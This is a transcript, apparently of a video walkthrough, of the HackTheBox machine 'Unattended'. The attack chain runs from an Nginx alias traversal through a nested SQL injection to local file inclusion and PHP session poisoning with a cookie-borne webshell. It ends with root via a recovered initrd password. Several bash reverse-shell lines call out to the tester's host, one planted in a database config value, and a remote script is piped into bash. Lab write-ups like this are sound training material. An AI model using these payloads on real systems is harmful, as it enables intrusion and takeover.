What's going on YouTube? This is Ipsec, and we're doing Unattended from HackTheBox, which I believe the name comes from the final step, which is rooting the box. The disk itself is encrypted, so normally with encrypted disks, when you boot up, you have to manually enter the password. The creator did a hack with an initrd to input the password when the machine's unattended, allowing the machine to boot up with an encrypted drive. Anyways, I really like this box because it benefits those that are multidisciplined, meaning that they learn how to build things as well as break them. The foothold on this box is really tough. It's a nested SQL injection, very similar to a second order SQL injection, where you have one SQL query that has user input. You make that SQL query's output a SQL injection, so when another SQL query uses the output, it gets injected as well. And all that is done blindly, which makes it really tough, unless you take advantage of a source code disclosure and then build the application on your own, because if you control the application, you can enable debug mode and step through exactly what's going on, and it becomes very apparent. So with that being said, let's jump into the box. As always, we begin with nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it unattended, and then the IP address, which is 10.10.10.126. Can take some time to run, so I've already ran it. Looking at the results, we have just two ports open. We have HTTP on port 80 and HTTPS on port 443. Both ports are running Nginx version 1.10.3, but of course the HTTPS one does have a certificate, which is leaking the host name, which is www.nestedflanders.htb. So before I forget, I'm just going to add that into my host file because you never know if that's going to be needed. So 10.10.10.126, and then we'll also put it without the www. So that's that. And then the last thing, sometimes it's beneficial, sometimes it's not, but we do see that certificate was generated on December 19th, 2018. And if this is a self-signed cert, we know someone was on the box then. If this was like a cert from Let's Encrypt, you don't know that because those are generally automated because of how short the lifespan of those certificates are. But based upon this being 3 years, I'm guessing someone manually generated the certificate. So let's go check the page out. So 10.10.10.126 is just a blank page. Let's go to HTTPS. We see we have to accept the certificate warning, and then we could also view the certificate to see if we have any like email addresses or anything. So let's just go to details, go down, look at all the information, issuer, nothing there, and nope, nothing. So let's just confirm the security exception, and we get a blank page. We can try the hostname, www.nestedflanders.htb, and of course accept the certificate warning again, and we get the Apache 2 default Debian page. So we know the OS is now Debian, but we don't really have anything. So let's throw this into GoBuster. So let's go to terminal, and then we'll do GoBuster-H to see the syntax, and you'll see that I finally upgraded to GoBuster 3, which changed it up a little bit than my previous videos. We see right off the bat we have 4 available commands, one being help, so that's not really anything. So there's directory mode, DNS mode, and virtual host mode. We want to do the directory brute force, so we'll do GoBuster dir-h, and you see it's the syntax we're familiar with afterwards. So we'll do -u, https, www.nestedflanders.htb, and then -w for word list, user share sec list. Then we can do discovery, web content, and we'll try common.txt. So running this, we also need the -k flag to ignore SSL certificates. And we can see HDA, HDA access, and HTPassWD came back, but it's going to take a while, so I'm going to try upping the threads. So we'll do -t 100 to go from 10 threads to 100 threads, and we see how quick this is, but it's no longer really finding things. It missed a lot because we don't have that HDA, HDA access. It only found /dev. So 100 threads may be too much. I'm going to try 20 threads, and there we go. The great thing about this version of GoBuster, I believe, is you can do whitelisting status codes instead of, or you can blacklist status codes instead of only doing a whitelist. So they have better logic in a lot of things. it did find /dev, so I'm going to copy this syntax. We'll open a new window and add /dev. And up there it said dev had sent a 301 redirect. So let's go see what /dev is. So if we do /dev, it redirects us to dev/. So we could examine that in Burp Suite by turning Burp Suite on. Go to / send this request. Of course, we have to accept this certificate. Go to Burp Suite. And then if we do get on /dev, we can see we have crashed the web service because we're getting 503. So a GoBusters may actually be too much for the box. So let's put this to 10 threads, get rid of this one on dev, and do these slowly because we have definitely crashed the box doing that. So now when we send this, we get that 301 moved permanently, and the location just adds that trailing slash. So nothing too interesting there. Turn intercept off, go back, and I guess that's all we can do right now with that. So we're stuck waiting for this GoBuster command to finish or give us new places to look at. So I'm just going to let this one run. And here we have it also finding a index.php. Index.html exists, but so does PHP. So let's go check out index.php. And we see a page of Nested Flanders portfolio. And it's telling us they had to restore the website to an old 2001 layout, but just drop them an email with a contact request. So if we go to contact, we will see, thanks so much for getting in touch with us. Unfortunately, the website is under heavy attack, so they disabled almost every dynamic page. Come back later. So we can also take a look at about. We see a company is leading export at Nesting Stuff, and they also have this STE in emphasis. Without that, it's just Ned Flanders, who this is a picture of. So he's from The Simpsons if you haven't watched that. I'm sure everyone's seen it. But anyways, we just have 3 pages. The main page with Ned Flanders on it, the about page with this, and the contact page with this. So naturally, the very first thing I want to do is play with this ID field. So if I put random junk in the ID, we're going to get main. So that is a little bit interesting. If we put 465 in the ID field, whoops, we get the about page. So if we put a single quote in it, we go back to main. So we just aired out the field. We can put --space-, which is a comment in SQL, and we go back to the intended page, which is about. We can also do a pound, which I believe is also a comment. Maybe it's not, pound space. Oh, we probably have to URL encode that because that's like an anchor tag in HTML. So let's just go and send this over into Burp. So send to repeater, click go. If we do Control-Shift-U here, we can see that's just URL encoded. We can do Control-U to URL encode that pound. And we see the about page, which is 465, before we send all this. Let's just put this in the clipboard. Is 1,547 bytes. If we do the main page, which is 25, I believe, main 25, that is 64 bytes. So as long as we're not at 64 bytes, we're good. So let's go back, paste the single quote, and then pound signed, and we're on 47 bytes. So this still works. I normally just don't use the pound because if you put it in URL bar, then your web browser is just going to ignore it because it's meant for anchors. So we definitely have a SQL injection here. We can play with this a little bit further by doing like, a union to see if we get anything. So we can do union 1 and send this all. And as long as we don't get the 1,564 bytes, we should be good. So union 1, we got 64 bytes, but we also forgot to put the comment at the end. Still 64 bytes. So we can do 1 comma 2, 64. Let's see. I thought that union would have worked. We can put a single quote here, and then the server will put the trailing single quote. 164. So it looks like our union is still failing. So we can do 2, 3, send it, 64. So union just isn't working. We can try putting contact and see what happens. Click send, 64. So nothing seems to be working with us here. So while we fool with this, we probably should have sent this over to SQLMap. So let's copy the request and then do, I got rid of something. We got, server status there. But let's do SQLMap. But before we do that, let's make a directory request. And then we can just right click, copy to file, requests. And this will be id.rec. Go in there, SQLMap-r, that file, -p id, and we'll do --batch so it doesn't ask us for anything. So while that runs, let's go back to burp and play with this field. The first thing I want to do is revisit this union thing. So if we do union, select 1, put this all in URL encoding, we get, we need the comment. Click send, 1,209 bytes. So I think I forgot the select last time. So I think I just did union 1 because I was talking and just forgot to type something. So we get 1,209 bytes when we do 1. If we do 2, we get 1,564. So we air it out. We know we want 1. We can render the page and see what this looks like. And we just don't get anything. So if we wanted to, we could try saying, hey, this select statement returned contact, which is a string on the page. And if we go back to raw, 1,428 bytes. If we do about, we get 1,557. And if we do main, we get something different. So we know we have a union injection here, but unfortunately, we can't really control what's on the output of the page because we can only select certain things. If we have an error message, it just goes to the main page, and we're not getting any of the output that we union out. So we're kind of stuck here. The one thing that we haven't really explored is /dev. And this is Nginx. Why is this asking for assert again? Let's go back to burp suite. We'll just turn intercept off. I gotta add burp to my CA. Let me do that real quick. Let's go http:// CA certificate, save. I rebuilt my Kali VM, so that's why I'm having to do all this stuff. Certificates, authorities, import, CA cert, identify websites. Okay. That should make things a bit better. So, what was I? Oh, we want to go to dev. So we know this is a Nginx thing, and Nginx has a misconfiguration. I think it's in the latest. I'm not positive about that. But if you search orange psi path traversal, and it is breaking parser logic. There's also a video of this somewhere. Breaking parser logic. Oh, this one right here. It's a good watch. It has stuff about this exploit. And in order to demonstrate it, let us just Google, let's do Django Nginx config. And we will just go to read the docs and grab a Nginx config that's used in Django. Django is just a common thing I've seen this in. And before we do that, we have this SQLMap. Did find it, so let's do --batch --dbs to enumerate what database is on the server. And then let's go vi. I'll just call this notes, and we'll paste this config. Let's see if we move nodes to nodes.config for Nginx. Will Vim highlight? Yes, it will. So this is just a standard Nginx config, and you got the server, what port it's listening on, and stuff. So most web servers, you don't ever want to execute things out of places users may upload, which is like media, static, downloads, etc. You just want that to be file storage. So we see in Nginx location /static/ and it's aliased to this directory. And this directory will never execute code, so if you upload a PHP, Python, whatever file, it's just going to serve that file. On location /, this is what's doing a proxy pass and sending it to something to execute code. So the misconfiguration is if you don't have a trailing / here, then what's going to happen is the location is /static, so you send a GET request to /static, and you hit this code block. And then you put 2 periods. Well, you hit this code block, which is aliased to this directory with a trailing /, and then put your 2 dots there. And then if you do /, you have now essentially escaped out of this, and you can access files that's not in static. So hopefully that makes sense. So that's what we're going to try to do here. So let's go back to burp. We can go to repeater, and we're going to get /dev/, and we see 200 OK. If this directory doesn't exist, we of course get a 404. If we do dev ... we get a 403 forbidden. So I'm thinking that we have like a alias location /dev, and that's alias to var /dub, and instead of HTML, it'll probably be alias to dev, and that's it. And then location / alias / var /dub HTML, and this will be execute code. So the Nginx config probably looks something like this. So when we did this .. we are now in var /dub, and if we go to HTML, we'll see what happens. So dev HTML, click go, move permanently. It puts a trailing / on for us. So we'll put that trailing /. And now we're there, so we can try index.php. And now we have the source code. So let's copy this entire thing. Go into terminal. We can make dir nginx download source. And then vim index.php. Paste it. And then start looking at this code. So server name, localhost, username, Ned Flanders. We got a password. So if we copy this, wc echo-n, paste wc-c, 38. It's not a known hash length, so I'm guessing this isn't a hash. And then I also see some weird hex like 10, which I know wouldn't be like valid ASCII, so I'm guessing this isn't anything. Because if we do man ASCII table, man maybe just ASCII, hex 10, which is this. So that's why I'm not thinking it's hex, and maybe that's just a password. So let's keep going down. We got the database, which is netty. We got this debug flag, which is false. We got a second file with a long name, so let's just copy this, go back into burp, and see if we can download that file. Send. Looks like we can. So we'll copy this, go into the same directory, and then I should copy this, vi, that, copy, paste. Okay. So keep going down. We have SQL statements. So let's see. This is the SQL which we are doing. So select name from ID where ID equals 25. So this is it failing. So here's the syntax. SQL is equal to name from ID which equals this. If it fails or it doesn't exist, go to 25, which is main. So this is why we kept seeing the main page when we failed. And then we're taking the result and then returning this. So let's see how this code works, because these are functions. So we have to get into main to see what happens. So let's see. TPL. So this is the main of the program. It's going to run. It's going to create this TPL variable, and it's going to get TPL from ID. Well, I'm guessing this means template. And then that template is going to return like main or something. It's going to return whatever the name is, an ID name. So it may help if we did SQL stuff. So we want to do -D, netty, and -- tables. So if we had a visualization of the database, this may make more sense. But anyways, the name, this is going to be a PHP file. And then it's going to pass that into get path from this. And then at the, what it does with this is creates that include variable. And include is going to execute code. So a little bit hard to understand. So let's just create our own server and enable this debug flag and step through the code. And this is where Docker is going to come in super handy. No. Sometimes it's so hard to exit Vim. But anyways, where's index.php? Oh, I didn't save it. Shoot. I forgot I opened the file in Vim and pasted instead of saving it somehow. So we can just copy this. Look at this, and it's still going so slow. -- tables, and we want threads 10. Okay. We could probably make this not blind, because we know the error code is getting to the main. So let's see if we can fix this real quick. Whoops, sorry about that. I hit the mic. But let's see. If we go to main, turn intercept off. It is off. Let's see. If we say the error is equal to ridiculous, wonder what's going to happen. So let's go back and SQLMap-H grep-I error. SQLMap-H less error. Oh, let's see. Can't remember the syntax. Let's just try it. So let's try --string or not dash string. And we said ridiculous. So see if this speeds up SQLMap, because we don't want to do blind. Let's see. If we get rid of all these settings, we'll see. Yes, follow. Still doing blind. rm.sqlmap -rf. And try this. We want to do --batch. And quit v id.request 465. That's fine. I just want to make sure we weren't sending it to page 25, which would always have that even if it has a success. So hopefully this will tell us something other than blind. But while that runs, we can go ahead and start creating our Docker. So we would need to install Docker first. So apt install docker -compose. Yep. And while that downloads, I'm going to go to Google, and we're doing LAMP docker GitHub. LAMP stands for, I forget what L stands for, but Apache, MySQL, and PHP. So let's just go to this GitHub page. And you could go to like Docker Hub and just pull one, but I like doing it this way better. So we'll git clone on this project. And then the Docker file, this is going to just say what things to install or pull from Docker Hub. And then this compose file is actually going to be the configuration. So this is giving us 3 different containers. We got www, the DB, and PHP myadmin. I don't want PHP myadmin, so I'm just going to delete that container. So now we just got 2. So www, it's going to redirect port 8001 on our local machine and send it to port 80 of this Docker. That is fine. It's going to take our current working directory /www and mount that to var www.html. It's going to link us to the DB container and going to give us the default network. Database is going to install MySQL version 8.0. It's going to map port 3306 on our local host to 3306 of the Docker container, and then configure MySQL with MyDB as the database, user, test, and here are the volumes, and that's it. So the Docker entry point is going to be /dump. And there is a dump here, and that's going to be the database. So we want to change the database. There are 2 tables we want. If we go into Nginx downloads, vim index.php, well, we can probably just grep select out of this. We know we want the table ID name, and we also want a table file path. So we need 2 tables. And then we need, under ID name, we need ID, and we need name. So let's go create that. So the first one will be ID name, and we already got ID and name here, so that should be fine. We need a second table, so we'll just paste this. That table was file path. If we go over here, file path, we need name and path. So let's do, we can just delete ID, put path here, and that should be fine. Next thing we have to do is insert data into this. So we can insert into ID name, and it was, if we go back, main is 25. I'm looking at the bottom left of the screen. About is 465, and contact is 587. So we can do 25, 465, and 587. And all this stuff isn't needed, but if you want to be an excellent pen tester of vulnerability, you should know how to stand up services on your own, so you can always play with things in your own lab. Because if you have control of the software, you have control over how things output, and you can see things that you normally wouldn't be able to. So we got that one pulled. Let's create the second input. And this one we don't exactly know that much about, other than one is name and one is path. And name we know is going to be from this table, so they're linked. So this will be, let's see, we can just, since we already have main about contact there, we can put this to be name and this to be path, just changing the order we're putting them in. And I'll call this main.php, about.php, and contact.php. We know that's not the case on these servers, because if we just go to main.php, it doesn't exist. But that part doesn't really matter. The last thing we have to do is a dub. This is just the default index of the Docker. We'll just make this .php back and copy the Nginx downloaded stuff into this directory. And I think we have it. So we can just do docker compose. Is it up-d? I think that will go install everything. And then while Docker installs, let's see, where's this? Boolean base blind. So by doing that -- not string, we have now SQLMap saying Boolean base blind instead of only time base blind, which is great for us. So now if we do or $D netty -- tables, we should see this go a lot faster than before. There we go. So you can see how much quicker this is before, and we can also do -- threads 10, and almost instantly got that one. So I'm pretty sure this is doing Boolean based right now instead of going to time based. And it's going pretty quick, so yeah, that is definitely doing the Boolean based output to speed up getting data out of this. So we'll just wait for Docker to finish, which it already did. So if I do Docker PS, shoot, it looks like we have an error in our dub direct, MySQL, because that Docker container is not running. V dump mydb. Let's see. What could be the error? path name, name path, that's good. ID name, ID name. Everything looks good. Let's see, Docker images, Docker, is it run MySQL? Database initialized, password not. Let's see. Docker compose up-d. V Docker compose. I don't know why it's not starting the DB. Let's just go down with the config. Maybe I deleted something extra out of this. Raw. We can also do Docker ls or containers ls. Let's see. It says that DB is running. Docker ps. Okay, so maybe I just did Docker ps too quickly and the database had not started yet because it's running now. I have no idea what happened there, but looks good. If we do localhost, it was 8001. We have a bunch of errors, like a bunch. Oh, if we go to www v index.php, let's go here. Nginx downloaded. Nope. Docker lamp. www. Index.php back. We can see we errored out because we can never connect to the database. And we can't connect to the database because we didn't change username, password, and things like that. So if we go here, we're connecting. The host name is DB, the user is user, the password is test, and the database is MyDB. So user is going to be user instead of localhost. This is going to be DB, and it probably would work with localhost because we didn't change the port. We're remapping localhost 3306 to the container 3306. So localhost would probably work there. Password is test, and the DB is MyDB. Okay. Refresh the page, and we don't really get any errors except file name cannot be empty on line 97. And that's probably because we don't have main.php. So if we v main.php and we put please support me on Patreon, refresh, main. File name cannot be empty on line 97. Let's look at line 97. Vim index 97, include inc, and inc should be something. Let's just turn debug on and see all the debug output this application gives. Refresh the page. So we can see all the things, all the commands. So it's doing a select name from ID name where ID equals 25, and that's pulling main. So selecting path from file path where name is equal to main, and we're not getting anything. So maybe there's no main in file path. If we do MySQL -u user -p test -d my DB to connect to it. I think capital D. Password is test. H localhost. Let's just look at dump. CD dump. What is this database? So let's see. So into file path. I wonder if it just didn't like us swapping those two. And it still has name as main.php. So if we do union select main.php, put a comment, we still don't get anything. So there's definitely something screwed up with that file path table that we have to go examine. So let's see, MySQL-u user-D mydb-h localhost. I should be able to connect to that. -p3306 localhost. It is open. Let's make sure we did the host flag correctly. So man MySQL host -h. So MySQL-h localhost-u user-p. Put the password as test, and it can't connect. Try connecting to the Docker. So Docker container ls Docker container inspect. We want this. IP address is 172.18.02. So let's do 172.18.02 test, and we get in. So something's weird with the network mapping, but we're in. We can do show databases, use MyDB, show tables, and the file path table does not exist. So I'm not sure why that is. Let's go to Docker lamp dump, cat that, and we can try creating this. So create table file path. Go up, paste, line 3. So we have an error somewhere to the use of path. Let's see. Path varchar not null. Oh, we don't have a comma. Shoot. That'll do it every time. So if we create this table, paste, okay, and now we can insert stuff into the table. Okay. Refresh this page. There we go. So let's take debug off so you can see what it looks like without debug. So let's just exit that. Exit this. Go in www v index.php. Debug set to false. And you can see the page. If we put the image there, all this would look the same. If we click on about, everything's erroring out and going to main. But if we did something on about, if we created about.php and says please subscribe on YouTube, then refresh about, still erroring. This is not going as smooth as I thought it would. Turn debug to true. Okay. Select name from ID name where ID equals 465. Go to main. Find that. 25. Everything is returning main. Weird. MySQL, use my DB, show tables, select stir from ID name, select stir from ID name. We don't have anything in ID name. So because our script had errored out, it just didn't progress. So let's go back into Docker LAMP and populate ID name. So cat this, insert into, paste. So what happened was we errored out right here because we didn't have the comma, so it didn't make it into this insert statement. So now if we do about, we see please subscribe on YouTube. If we do main, we get Patreon. If we do contact, we get an error message because there's no contact.php. So that is what we finally expected. So now we can do what we want to do in the beginning and analyze the SQL injection, because this is a cool one. So we click send, we have the debug statement here. So when I put that single quote in and we hit a error message, you see what's happening. That's the single quote we injected, and then it appends that. So we did the comment, and then this one is rejected. And we can do union select one and send this in. So this statement works. We have successfully done a union injection. Ret TPL equals 1, but there's no path from file path where name is equal to 1, so we error out here. So what we have to do is inject into this injection. So what if we put a union injection in this? So if we do a second union right here, so we're going to put a single quote after this one because we want to terminate it. Terminate this. So right now, that one single quote is that piece. So we can do one single quote, union, select, IPsec, and then I think that may be fine. Let's URL encode the spaces, see what happens. Okay. So we have successfully put that as the return template, but we still errored out here because we didn't kill off this last single quote. So if we do, think that, there we go. So this piece, what I highlighted, gets injected into this second injection. And this single quote after this one is needed to place this here. If we don't do that, you can see exactly what happens. It'll error out because we don't have that single quote. So that's why you see the double quote on the left side, because that is quoting everything to go into the second SQL, and then the single quote on the right side of that one is to escape this. So hopefully that makes sense. And then you get the return path of IPsec. So now we can include any file we want on the server. So if we did like index.php, we'll see it does stuff. So now we have to find a way to get code execution on the server. There's a few things you can do. There is like proc self fd, and then you can just cycle through numbers and then eventually find the file descriptor for your request that may have code you can influence. There's also like the Nginx log file that you may be able to read, but I don't recommend doing that one because if you screw up and put a PHP syntax somewhere, then PHP stops processing the file and you have a major issue. So if you were depending on that to do the box, someone could just screw you up completely. There is a file on this server, though, that one with a weird hash. So let's examine what this is doing. So we're getting a session start, and then sending every cookie we have into our session. And PHP sessions get stored generally on the disk. So if we can find out the cookie file name, we may be able to inject a malicious cookie and get code execution through that. So what I'm going to do is we're going to jump into our Docker container and look at the session file. So let's do Docker container ls. So we want to attach to this. So Docker container attach. Shoot, I just shut my container down, I think. Docker ps, I did. Docker container start. It's back running. It's attached to it. I wonder if I have to specify like -ti or something. Probably. Shutting it down. Let's start it again. Container attach, bin bash. I think I do -ti here. Let's see. Sorry about this. I don't use Docker that much. Attach, kill it. Let's do start, bin bash. I think I can do ti there. Nope. Let's see. Going over to Google. Docker attach run bash. Come on, load. You can turn intercept off probably. I think it's intercepting that request. Yep. Oh, exec. That's it. Let's start the container. Docker exec-it. This. And run bash. There we go. Let's go to / find dot -name stir ses and then pipe errors to dev null to find where sessions are. They're just in /tmp, and we can see what a session looks like on disk. If we do just cat it, cat star c5. This session has data. Cat this, we can see what it looks like. So if we go back into our burp, go to repeater, that C5 name is used for the file name, and then the cookie we are sending is nothing. So because the code is taking all the cookies and committing them into the session, so for each cookie, commit cookie into session, we can write into that file. So if we just say we have a cookie called ipsec, and ipsec is going to do PHP, and then system on a GET request, or not that, GET like this, please sub, and then get out of PHP. If we send this, and now go back into that same exact cookie, we can see this cookie file now has our PHP code. So if we include this, we will get code execution here as long as we have the please sub variable. So it's just like any other PHP shell, but yeah. So let's try this. Let's do the file /tmp sess underscore the PHP session ID. And then we also need to create that variable please sub is equal to, we'll do, who am I guess. Click go. And we see it's giving us our PHP session ID, IPsec, and then the user www-data. So there we go. We have code execution in our Docker container. Now we have to do that on the actual web server. So let's go back here. Let's see. This is on nested flanders. So if we do, we can probably just copy that whole request. So copy this, send it here, index.php. So here's the command. We don't need this for now. ID is equal to 587. That's fine. Union select temp SESS. We need to change that session ID. So copy, paste, and then click go. And we don't get anything. So if we try other default PHP locations like var temp, click go, still 1,209 bytes. What if we tried var lib PHP sessions, 1,209 bytes. Oh, we never copied the cookie. Click go. So var lib PHP sessions. We don't have SESS. 1,277 bytes. So we found the location of PHP, and if you just Google like default PHP locations, where's PHP sessions file stored? It's probably on this page, but var temp temp/session, var temp/session, var lib PHP session. There's a few standard locations. So we have code execution here, and our target's still www.nestedflanders. So now the time comes to get a reverse shell. So let's go here, and we can do nc lvnp. We'll do port 443. If you enumerate this box more and did like find /etsy dash or grep, what is it, IPv4, and enumerated this, let's see, find Etsy. Can we run that? Let's see. Etsy IP tables rules v4. So if we looked at the IP tables rules, cat, we would see the output only allows 80 and 443. So that's why I didn't do 9001, because looking at IP tables says we can't do that. So for exploit, we will do, I'll type it in terminal because it's easier to read, bash-c, then we'll do bash-i, direct and dev tcp 10.10.14.3, which is my Kali box, /443, and then 0 and 1 like that. And then we end that, And that is it. So let's copy this, go up, paste, go to burp, paste that in, URL encode it, click send, and now we are on the box. So if we do which Python 3, we don't have any Python in the box, so we can't really get our shell that way. But there is a command called script, and we can do script-h. We want to do script-quiet command bin bash and send the output file to dev null. And this is essentially the same thing as the Python import tty. So now if we control Z this and do stty raw minus echo fg enter, we have tab autocomplete everything, so we have our standard shell here. So the very first thing I'm going to try to do is cat etsy, whoops, didn't type etsy, that's weird, etsy passwd, look at various users, and we don't see any. We could try su Guly, actually we did see that one, and then grab his password out of the PHP. Let's see, grab this. This is a MySQL password, and try reusing it. Let's see, is that in my clipboard? It is. I pasted it twice, so let's paste it once. And we get an authentication failure. If on the box you had actually looked at all the tables, there's a lot more tables than just ID name and file path. And this is from SQLMap. So now that we're on it, let's go and look into the MySQL database to see what's in the other tables. So let's do MySQL -u. This is going to be less index. Username is nested Flanders. -database is netty -p. And we can do show tables. And now we're in the database of Unattended. So let's just start looking at the tables. So I'll do select star from config. And let's see, select star from config. I don't know why sometimes I say things and forget to type it, but anyways, let's look at all these options. We have offline message, SQL host, an FTP user, Flanders, and FTP password. Well, we didn't have FTP exposed, so we can kind of ignore that, but may want to save this. And 0E1A, that looks familiar. Echo-N, WC-C, 72. Oh, that's, it looks familiar because there's a weird type confusion vulnerability in PHP if a hash begins with 0E, because that's the, if you Google like PHP equal VS 3 equals, you'll come up against it. But if you do 2 equals, it'll convert this, it sees 0E, and translates what after this to an exponent, which 0 to whatever exponent is always going to be 0. So you have a weird collision there. But move on. That doesn't really look too interesting. Email. We have this check release thing, and it looks like it's executing scripts. And because the way this is, I'm guessing this is just like piping bash. And we can see, looks like I accidentally updated SMTP secure when I was doing this box originally. As you see, something there. But if we just put that bash command into check release, we'll see what happens. So we want to do an update command. So we do update and then the table name, which is config. And then we set And what is that column? Option value. So set option underscore value, I think it was underscore. Yep. Underscore value equal to bash dash c. Let's do bash dash c bash dash I dev tcp 10.10.14.3 80 0 and 1 like that, and shoot, where id is equal to 86 semicolon. So now if we select star from config, select star from config, we see check release has that, and we should hurry up and set up a netcat listener on, I think we did port 80 there. Yep. So we can do select star from config where id is equal to 86 and just look at that. And every minute something does execute this. If you did like the looking at processes every second, you'd eventually see this get executed, but just running that, listening, we do have a shell as Guly, and we can do cat check base.pl, and we can see what those are. But if we do wc-c user.txt, we got 33 characters, which is an MD5 summon to line break. So we are confident we are on Guly. So let's run the Unix privs checker. So let's go up, cd, we'll copy it out, copy opt LinEnum, and then linenum.sh here, and we can do make dir dub, move that in there so we don't share our notes with everyone who hits our web server. And then python m simple HTTP server on port 80. So now we can curl 10.10.14.3 linenum.sh, pipe it over to bash, curl not found. We can do nc lvnp 80, whoever connects, send over linenum. And we can do cat dev tcp 10.10.14.3 port 80 and pipe that over to bash. Cat bash-c cat dev tcp 10.10.14.3 80 pipe bash like that. So not a file. Let's see. Can I pull it this way? Okay, I can pull it that way. So for some reason, cat can't access that. But if we direct it like this, 10.10.14.3 80 pipe to bash. There we go. Now linenum is running. Bit of a hack to get that working, but oh well. Go to the beginning. And let's just look through things. So let's see. Our kernel is from 2017. So maybe there... Oh no, that's GCC version. Unattended. December... Or not December. October 27th is when the kernel is. So that's only like 2 months when the box was created. And I say 2 months because that's when the SSL cert was. If you remember back from our enumeration, the SSL cert was generated, I think, December 19th. So can probably ignore that. Looking through user groups, we're a member of Grub, which is unique. And if we go down, let's see what else we see. Etsy passwd, we looked at that. Environmental, nothing interesting. Cron jobs, nothing too interesting. System D timers, nothing interesting. Networking information, nope. DNS, netstat, processes that are running. So far, the only thing that stands out is being a member of the Grub Group. MySQL, file locations, set UIDs, nothing non-default, configuration files, nothing. We do have a bash history. Oh, and in order to exit that, we just gotta kill our netcat. So cat.bash_history, nothing, because that's piped over to dev null. If you looked at mount and looked at everything, you would see something weird. We have SDA2 crypt. So you combine us being a member of the Grub Group, which is unique, and then the actual drive saying that it's encrypted, you got something interesting going on. So maybe we modified Grub to automap a encrypted drive, is what I'm thinking, because normally a system won't just automatically boot up if it's encrypted. You have to enter a password. So the other thing you could have done would be like find /-group grub to look at all the files that Grub owns or what's unique to them. And as always, pipe error messages to dev null. And we see there's one file, initrd.img. So the boot that Grub has access to, and that is unique. Additionally, you see December 20th, 2018. And if you look at the user.txt, December 20th, 2018. So user.txt was created the same day this initrd image was. So let's download this and see what it is or what's changed. So we'll do netcat lvnp 80 initrd.img is what we'll call it. Okay. And we can do cat/boot. And we can probably just paste. Copy, paste to dev tcp 10.10.14.3 port 80. Looks good. We got a connection from. Looks like it's already copied. And we have it here. So as always, we should md5 sum to make sure it fully copied. md5 sum 2b88 ends with 90, 2b88 ends with 90. So looks like we have the file in its entirety. So if we do a file against it, it's gzip encrypted. So in order to extract these, we should probably make our own directory. And we'll move init up one. And then go in that directory. So we'll do zcat to do a decompress cat on that. Zcat initrd.img. And then you pipe it to a command called cpio and do some flags. -I means extract. -d means make directories. And then M means preserve modify time. And V for verbose. So now we're extracting that kernel image. And we have to figure out what is unique here. So we could look for more things like December 20th. So if you do find period -type for file, newer modify time of 2018, 1219, this is when the SSL certificate was created. And then newer MT 2018 1221 -ls. We can see all the files that were created between that time, so we can narrow what we're looking for here. And then we also wanted something that dealt with whatchamacallit, the crypt, SDA2 crypt. And we got crypt root right here. So let's look at what this scripts is. And going down, udev parse activate set UID, taken from this. Let's see. I should probably vim it. Syntax highlighting does help sometime. You can search for password. Deal with look password sync when root changes. So here we have the crypt open command to try to decrypt the drive. And it's calling sbin uinitrd and then this string. So, and it should also tell us, let's see, Guly. So it looks like comments are prepended with Guly of Guly writing. So if we grep guly -r period, that's the only comment. If we grep password, we get a lot. If you don't want to see that binary file matches, -I gets rid of that. Let's see. Nothing too interesting. So let's go back into the crypt root. So we have to deal with look fs password sync when root changes her 1. So maybe this is hinting at something with the password. I feel like I missed something on this box. Let's go back to our shell. Where is our shell? Guly. Let's go to home directory. Find .-ls. That comment doesn't really make much sense, but the password to decrypt the drive is the same as the root password. So if we look at this, crypt setup, Guly, and we execute this, let's see, we'll copy this. Look in a machine. We don't have that sbin file. If we go into init, see, do we have that file in sbin? We get supercalusa, so we can try using this as the password. I should have labeled where my shell was. There we go. su dash must be run from a terminal, script dash qc bin bash /dev null su dash paste supercalusa authentication failure, so that's not the password. Let's try this password. su dash authentication failure. So at this point you could run whatchamacallit, IDA or Ghidra and try to analyze this. Every time we do something, it's giving us supercalusa. So why don't we just try executing the decrypt command on the box itself. So if we do sbin uinitrd, I have that on my clipboard. we get permission denied, mod plus x, sbin u initrd, copy sbin uinitrd, okay, cp slash sbin uinitrd to my home directory, permission denied. Let's see. Mount. Where can I write to? Let's do mount grep temp. I'm just making sure, looking for a place to mount a write to that does not have that no exec flag. Var temp also has no exec. So let's see. Var lib php sessions. Can't write there. So we can just do STRACE. If we apt install STRACE, we can see what this binary is doing. ls-la sbin uinitrd cd /sbin script init ls-la uinitrd. Yeah, only root can execute that. Okay, strace so sbin we can see the file does, let's see, what's it doing? We get no such file directory on /boot/guid, and it's also looking at /etc/hostname. So let's edit the etc hostname. Go back here, cat etc hostname. We get unattended. Paste. And then we want to cat etc boot guid, because that's the other file it read. V boot guid. Paste. Do strace again. So it accesses, reads unattended, boot guid, fine, and it writes something. So execute this. It wrote this. So let's see if this will work. su dash, paste, authentication failure. So let's do md5 sum boot guid to make sure we copy the files correctly. And we can do them on our box. md5 sum /boot guid. Same thing. md5 sum /etc hostname. md5 sum etc hostname. Those are the same. Let's history grep init. I think I left off something. Yeah, I didn't have the N1, so that's why I got that. So this definitely matters. It's doing some type of crypto routine. Let's try this password, su dash, and we have rooted the box. So there are two things I want to get into. We'll do Ghidra first and start loading it. It'll take a while to load. And while Ghidra goes, I want to look at an Nginx configuration analyzer. So Ghidra run. Let's see. Close, file, new project, non-shared, root, HTTP, boxes, unattended, project name, uinitrd. Open this. Then file, import file. Let's see, HTTP, boxes, unattended, init, sbin, uinitrd. It's an ELF file. Analyze it. Let's just select all, analyze, okay. So while that loads, let's go and analyze this. So one thing you could have done if you couldn't figure out how to get a TTY shell is if you did IPADDR on the box to look at IP addresses, you have an IPv6 address. And you could also do the link local. If you want to know how to do that link local, look at my sneaky video. But link local would mean you could just nmap the IPv6 box without being on the box to identify the link local address. But you could SSH, let's get out of root, go into our home directory, make dir.ssh, cd.ssh, and then make dir.ssh, sh-keygen, then copy the idrsa.pub. So if we copy this, and then put this as the authorized keys. Shoot. 2 authorized keys. Cat authorized keys. Looks good. chmod 600. And we'll chmod 600 idrsa, ssh-i idrsa, Guly at the IPv6 address, because IP tables is only configured to filter the IPv4 stuff. Yes. Let's see, it doesn't look like the key worked. sh-i idrsa. Let's see. chmod 600 .sh. Pub ls.sh authorized _ keys. Let's try transferring it via netcat. Let's see. It's mod 700. What's it, the directory permission on that? Nope. So let's try nc cat dev tcp 10.10.14 380 to authorize keys. mods. Wonder if authorized keys is disabled. Something weird that's stopping that. Oh, shoot. I have 2 L's there. There we go. I knew I wasn't going insane, but then you have a standard SSH and you can just SU that way. So the final thing we want to do is look at Nginx. So let's just cd/root tar cjvf etc nginx. We want to call this 